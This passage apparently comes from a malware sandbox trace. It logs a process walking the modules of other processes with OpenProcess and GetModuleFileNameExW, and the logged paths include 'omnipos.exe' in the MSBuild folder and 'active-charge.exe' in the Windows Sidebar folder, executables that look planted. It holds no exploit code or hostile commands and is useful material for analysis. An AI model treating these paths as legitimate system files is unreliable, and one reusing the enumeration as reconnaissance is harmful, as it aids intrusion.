lpBaseName="SPOOLSS.DLL") returned 0xb [0050.630] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9f90000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\SPOOLSS.DLL" (normalized: "c:\\windows\\system32\\spoolss.dll")) returned 0x1f [0050.637] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd570000, lpmodinfo=0x257dec0, cb=0x18 | out: lpmodinfo=0x257dec0*(lpBaseOfDll=0x7fefd570000, SizeOfImage=0x23000, EntryPoint=0x7fefd571198)) returned 1 [0050.640] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd570000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="srvcli.dll") returned 0xa [0050.643] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd570000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll")) returned 0x1e [0050.646] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb890000, lpmodinfo=0x2580080, cb=0x18 | out: lpmodinfo=0x2580080*(lpBaseOfDll=0x7fefb890000, SizeOfImage=0x71000, EntryPoint=0x7fefb8cecc4)) returned 1 [0050.649] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb890000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="winspool.drv") returned 0xc [0050.652] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb890000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv")) returned 0x20 [0050.655] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9f80000, lpmodinfo=0x2582250, cb=0x18 | out: lpmodinfo=0x2582250*(lpBaseOfDll=0x7fef9f80000, SizeOfImage=0x10000, EntryPoint=0x7fef9f88a48)) returned 1 [0050.659] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9f80000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="PrintIsolationProxy.dll") returned 0x17 [0050.662] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9f80000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\PrintIsolationProxy.dll" (normalized: "c:\\windows\\system32\\printisolationproxy.dll")) returned 0x2b [0050.665] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9f70000, lpmodinfo=0x2584440, cb=0x18 | out: lpmodinfo=0x2584440*(lpBaseOfDll=0x7fef9f70000, SizeOfImage=0xe000, EntryPoint=0x7fef9f782c4)) returned 1 [0050.668] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9f70000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="FXSMON.DLL") returned 0xa [0050.671] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9f70000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\FXSMON.DLL" (normalized: "c:\\windows\\system32\\fxsmon.dll")) returned 0x1e [0050.675] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9f10000, lpmodinfo=0x2586600, cb=0x18 | out: lpmodinfo=0x2586600*(lpBaseOfDll=0x7fef9f10000, SizeOfImage=0x34000, EntryPoint=0x7fef9f12f78)) returned 1 [0050.678] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9f10000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="tcpmon.dll") returned 0xa [0050.682] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9f10000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\tcpmon.dll" (normalized: "c:\\windows\\system32\\tcpmon.dll")) returned 0x1e [0050.685] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef3a70000, lpmodinfo=0x25887c0, cb=0x18 | out: lpmodinfo=0x25887c0*(lpBaseOfDll=0x7fef3a70000, SizeOfImage=0xb000, EntryPoint=0x7fef3a75390)) returned 1 [0050.688] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef3a70000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="snmpapi.dll") returned 0xb [0050.691] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef3a70000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\snmpapi.dll" (normalized: "c:\\windows\\system32\\snmpapi.dll")) returned 0x1f [0050.695] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef3a50000, lpmodinfo=0x258a980, cb=0x18 | out: lpmodinfo=0x258a980*(lpBaseOfDll=0x7fef3a50000, SizeOfImage=0x14000, EntryPoint=0x7fef3a5111c)) returned 1 [0050.698] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef3a50000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="wsnmp32.dll") returned 0xb [0050.702] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef3a50000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\wsnmp32.dll" (normalized: "c:\\windows\\system32\\wsnmp32.dll")) returned 0x1f [0050.705] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef3af0000, lpmodinfo=0x258cb40, cb=0x18 | out: lpmodinfo=0x258cb40*(lpBaseOfDll=0x7fef3af0000, SizeOfImage=0x1f2000, EntryPoint=0x7fef3af101c)) returned 1 [0050.708] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef3af0000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="msxml6.dll") returned 0xa [0050.712] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef3af0000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\msxml6.dll" (normalized: "c:\\windows\\system32\\msxml6.dll")) returned 0x1e [0050.715] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff2d0000, lpmodinfo=0x258ed00, cb=0x18 | out: lpmodinfo=0x258ed00*(lpBaseOfDll=0x7feff2d0000, SizeOfImage=0x71000, EntryPoint=0x7feff2e1e20)) returned 1 [0050.719] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff2d0000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="SHLWAPI.dll") returned 0xb [0050.722] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff2d0000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SHLWAPI.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")) returned 0x1f [0050.726] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9f60000, lpmodinfo=0x2590ec0, cb=0x18 | out: lpmodinfo=0x2590ec0*(lpBaseOfDll=0x7fef9f60000, SizeOfImage=0xf000, EntryPoint=0x7fef9f6141c)) returned 1 [0050.729] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9f60000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="usbmon.dll") returned 0xa [0050.733] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9f60000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\usbmon.dll" (normalized: "c:\\windows\\system32\\usbmon.dll")) returned 0x1e [0050.736] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9f50000, lpmodinfo=0x2593080, cb=0x18 | out: lpmodinfo=0x2593080*(lpBaseOfDll=0x7fef9f50000, SizeOfImage=0x7000, EntryPoint=0x7fef9f519a4)) returned 1 [0050.740] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9f50000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="wls0wndh.dll") returned 0xc [0050.743] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9f50000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wls0wndh.dll" (normalized: "c:\\windows\\system32\\wls0wndh.dll")) returned 0x20 [0050.747] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef3970000, lpmodinfo=0x2595268, cb=0x18 | out: lpmodinfo=0x2595268*(lpBaseOfDll=0x7fef3970000, SizeOfImage=0x3a000, EntryPoint=0x7fef39913b4)) returned 1 [0050.750] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef3970000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="WSDMon.dll") returned 0xa [0050.754] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef3970000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WSDMon.dll" (normalized: "c:\\windows\\system32\\wsdmon.dll")) returned 0x1e [0050.757] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef39b0000, lpmodinfo=0x2597428, cb=0x18 | out: lpmodinfo=0x2597428*(lpBaseOfDll=0x7fef39b0000, SizeOfImage=0x91000, EntryPoint=0x7fef39b237c)) returned 1 [0050.761] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef39b0000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="wsdapi.dll") returned 0xa [0050.764] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef39b0000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\wsdapi.dll" (normalized: "c:\\windows\\system32\\wsdapi.dll")) returned 0x1e [0050.789] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef3850000, lpmodinfo=0x25995e8, cb=0x18 | out: lpmodinfo=0x25995e8*(lpBaseOfDll=0x7fef3850000, SizeOfImage=0x11f000, EntryPoint=0x7fef3851048)) returned 1 [0050.792] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef3850000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="webservices.dll") returned 0xf [0050.796] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef3850000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\webservices.dll" (normalized: "c:\\windows\\system32\\webservices.dll")) returned 0x23 [0050.799] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefc950000, lpmodinfo=0x259b7b8, cb=0x18 | out: lpmodinfo=0x259b7b8*(lpBaseOfDll=0x7fefc950000, SizeOfImage=0xbb000, EntryPoint=0x7fefc956de0)) returned 1 [0050.803] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefc950000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="FirewallAPI.dll") returned 0xf [0050.807] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefc950000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll")) returned 0x23 [0050.811] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefc940000, lpmodinfo=0x259d988, cb=0x18 | out: lpmodinfo=0x259d988*(lpBaseOfDll=0x7fefc940000, SizeOfImage=0xc000, EntryPoint=0x7fefc941064)) returned 1 [0050.814] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefc940000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="VERSION.dll") returned 0xb [0050.818] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefc940000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\VERSION.dll" (normalized: "c:\\windows\\system32\\version.dll")) returned 0x1f [0050.822] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef3a90000, lpmodinfo=0x259fb48, cb=0x18 | out: lpmodinfo=0x259fb48*(lpBaseOfDll=0x7fef3a90000, SizeOfImage=0x33000, EntryPoint=0x7fef3a94cfc)) returned 1 [0050.826] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef3a90000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="FunDisc.dll") returned 0xb [0050.861] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef3a90000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\FunDisc.dll" (normalized: "c:\\windows\\system32\\fundisc.dll")) returned 0x1f [0050.866] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefac40000, lpmodinfo=0x25a1d08, cb=0x18 | out: lpmodinfo=0x25a1d08*(lpBaseOfDll=0x7fefac40000, SizeOfImage=0x10000, EntryPoint=0x7fefac49c20)) returned 1 [0050.871] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefac40000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="fdPnp.dll") returned 0x9 [0050.877] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefac40000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\fdPnp.dll" (normalized: "c:\\windows\\system32\\fdpnp.dll")) returned 0x1d [0050.882] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef3a80000, lpmodinfo=0x25a3ec8, cb=0x18 | out: lpmodinfo=0x25a3ec8*(lpBaseOfDll=0x7fef3a80000, SizeOfImage=0xe000, EntryPoint=0x7fef3a81020)) returned 1 [0050.887] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef3a80000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="winprint.dll") returned 0xc [0050.893] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef3a80000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\spool\\PRTPROCS\\x64\\winprint.dll" (normalized: "c:\\windows\\system32\\spool\\prtprocs\\x64\\winprint.dll")) returned 0x33 [0050.899] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefcb20000, lpmodinfo=0x25a60b8, cb=0x18 | out: lpmodinfo=0x25a60b8*(lpBaseOfDll=0x7fefcb20000, SizeOfImage=0x1e000, EntryPoint=0x7fefcb213b8)) returned 1 [0050.904] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefcb20000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="USERENV.dll") returned 0xb [0050.909] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefcb20000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\USERENV.dll" (normalized: "c:\\windows\\system32\\userenv.dll")) returned 0x1f [0050.914] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd780000, lpmodinfo=0x25a8278, cb=0x18 | out: lpmodinfo=0x25a8278*(lpBaseOfDll=0x7fefd780000, SizeOfImage=0xf000, EntryPoint=0x7fefd7819b0)) returned 1 [0050.919] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd780000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="profapi.dll") returned 0xb [0050.925] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd780000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")) returned 0x1f [0050.930] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefcb00000, lpmodinfo=0x25aa850, cb=0x18 | out: lpmodinfo=0x25aa850*(lpBaseOfDll=0x7fefcb00000, SizeOfImage=0x1b000, EntryPoint=0x7fefcb02068)) returned 1 [0050.934] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefcb00000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="GPAPI.dll") returned 0x9 [0050.939] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefcb00000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\GPAPI.dll" (normalized: "c:\\windows\\system32\\gpapi.dll")) returned 0x1d [0050.943] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb330000, lpmodinfo=0x25aca10, cb=0x18 | out: lpmodinfo=0x25aca10*(lpBaseOfDll=0x7fefb330000, SizeOfImage=0xc000, EntryPoint=0x7fefb3315d8)) returned 1 [0050.947] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb330000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="dsrole.dll") returned 0xa [0050.951] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb330000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll")) returned 0x1e [0050.955] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef3790000, lpmodinfo=0x25aebd0, cb=0x18 | out: lpmodinfo=0x25aebd0*(lpBaseOfDll=0x7fef3790000, SizeOfImage=0xbd000, EntryPoint=0x7fef3799a9c)) returned 1 [0050.959] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef3790000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="win32spl.dll") returned 0xc [0050.964] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef3790000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\win32spl.dll" (normalized: "c:\\windows\\system32\\win32spl.dll")) returned 0x20 [0050.968] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef3760000, lpmodinfo=0x25b0da0, cb=0x18 | out: lpmodinfo=0x25b0da0*(lpBaseOfDll=0x7fef3760000, SizeOfImage=0x2d000, EntryPoint=0x7fef376136c)) returned 1 [0050.972] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef3760000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="inetpp.dll") returned 0xa [0050.977] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef3760000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\inetpp.dll" (normalized: "c:\\windows\\system32\\inetpp.dll")) returned 0x1e [0050.981] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefcb40000, lpmodinfo=0x25b2f60, cb=0x18 | out: lpmodinfo=0x25b2f60*(lpBaseOfDll=0x7fefcb40000, SizeOfImage=0x12000, EntryPoint=0x7fefcb41060)) returned 1 [0050.986] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefcb40000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="DEVRTL.dll") returned 0xa [0050.990] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefcb40000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\DEVRTL.dll" (normalized: "c:\\windows\\system32\\devrtl.dll")) returned 0x1e [0050.995] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefcb60000, lpmodinfo=0x25b5120, cb=0x18 | out: lpmodinfo=0x25b5120*(lpBaseOfDll=0x7fefcb60000, SizeOfImage=0x1f000, EntryPoint=0x7fefcb65c68)) returned 1 [0050.999] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefcb60000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="SPINF.dll") returned 0x9 [0051.003] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefcb60000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\SPINF.dll" (normalized: "c:\\windows\\system32\\spinf.dll")) returned 0x1d [0051.008] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd070000, lpmodinfo=0x25b72f8, cb=0x18 | out: lpmodinfo=0x25b72f8*(lpBaseOfDll=0x7fefd070000, SizeOfImage=0x18000, EntryPoint=0x7fefd073b48)) returned 1 [0051.012] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd070000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="CRYPTSP.dll") returned 0xb [0051.017] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd070000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\CRYPTSP.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")) returned 0x1f [0051.021] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefcd70000, lpmodinfo=0x25b94b8, cb=0x18 | out: lpmodinfo=0x25b94b8*(lpBaseOfDll=0x7fefcd70000, SizeOfImage=0x47000, EntryPoint=0x7fefcd71064)) returned 1 [0051.026] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefcd70000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="rsaenh.dll") returned 0xa [0051.030] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefcd70000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")) returned 0x1e [0051.035] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd720000, lpmodinfo=0x25bb678, cb=0x18 | out: lpmodinfo=0x25bb678*(lpBaseOfDll=0x7fefd720000, SizeOfImage=0x3d000, EntryPoint=0x7fefd7218f4)) returned 1 [0051.039] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd720000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="WINSTA.dll") returned 0xa [0051.044] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd720000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WINSTA.dll" (normalized: "c:\\windows\\system32\\winsta.dll")) returned 0x1e [0051.049] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb0e0000, lpmodinfo=0x25bd838, cb=0x18 | out: lpmodinfo=0x25bd838*(lpBaseOfDll=0x7fefb0e0000, SizeOfImage=0xf000, EntryPoint=0x7fefb0e1040)) returned 1 [0051.053] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb0e0000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="cscapi.dll") returned 0xa [0051.058] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb0e0000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll")) returned 0x1e [0051.062] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb9c0000, lpmodinfo=0x25bf9f8, cb=0x18 | out: lpmodinfo=0x25bf9f8*(lpBaseOfDll=0x7fefb9c0000, SizeOfImage=0xc000, EntryPoint=0x7fefb9c18a4)) returned 1 [0051.067] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb9c0000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="netutils.dll") returned 0xc [0051.071] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb9c0000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")) returned 0x20 [0051.076] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x848) returned 0x218 [0051.076] EnumProcessModules (in: hProcess=0x218, lphModule=0x25c3930, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x25c3930, lpcbNeeded=0x41eb20) returned 1 [0051.077] GetModuleInformation (in: hProcess=0x218, hModule=0xf40000, lpmodinfo=0x25c3ba0, cb=0x18 | out: lpmodinfo=0x25c3ba0*(lpBaseOfDll=0xf40000, SizeOfImage=0x17000, EntryPoint=0xf414a1)) returned 1 [0051.077] GetModuleBaseNameW (in: hProcess=0x218, hModule=0xf40000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="active-charge.exe") returned 0x11 [0051.078] GetModuleFileNameExW (in: hProcess=0x218, hModule=0xf40000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Windows Sidebar\\active-charge.exe" (normalized: "c:\\program files (x86)\\windows sidebar\\active-charge.exe")) returned 0x38 [0051.078] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x25c5de0, cb=0x18 | out: lpmodinfo=0x25c5de0*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0051.078] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0051.079] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0051.079] GetModuleInformation (in: hProcess=0x218, hModule=0x75300000, lpmodinfo=0x25c7fa0, cb=0x18 | out: lpmodinfo=0x25c7fa0*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0051.079] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75300000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0051.080] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75300000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0051.080] GetModuleInformation (in: hProcess=0x218, hModule=0x752a0000, lpmodinfo=0x25ca160, cb=0x18 | out: lpmodinfo=0x25ca160*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0051.081] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x752a0000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0051.081] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x752a0000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0051.082] GetModuleInformation (in: hProcess=0x218, hModule=0x75290000, lpmodinfo=0x25cc330, cb=0x18 | out: lpmodinfo=0x25cc330*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0051.082] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75290000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0051.083] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75290000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0051.083] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x90c) returned 0x218 [0051.083] EnumProcessModules (in: hProcess=0x218, lphModule=0x25cea40, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x25cea40, lpcbNeeded=0x41eb20) returned 1 [0051.084] GetModuleInformation (in: hProcess=0x218, hModule=0x1190000, lpmodinfo=0x25cecb0, cb=0x18 | out: lpmodinfo=0x25cecb0*(lpBaseOfDll=0x1190000, SizeOfImage=0x17000, EntryPoint=0x11914a1)) returned 1 [0051.084] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x1190000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="omnipos.exe") returned 0xb [0051.084] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x1190000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\MSBuild\\omnipos.exe" (normalized: "c:\\program files (x86)\\msbuild\\omnipos.exe")) returned 0x2a [0051.085] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x25d0ec0, cb=0x18 | out: lpmodinfo=0x25d0ec0*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0051.085] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0051.085] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0051.086] GetModuleInformation (in: hProcess=0x218, hModule=0x75300000, lpmodinfo=0x25d3080, cb=0x18 | out: lpmodinfo=0x25d3080*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0051.086] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75300000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0051.087] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75300000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0051.087] GetModuleInformation (in: hProcess=0x218, hModule=0x752a0000, lpmodinfo=0x25d5258, cb=0x18 | out: lpmodinfo=0x25d5258*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0051.088] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x752a0000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0051.088] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x752a0000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0051.089] 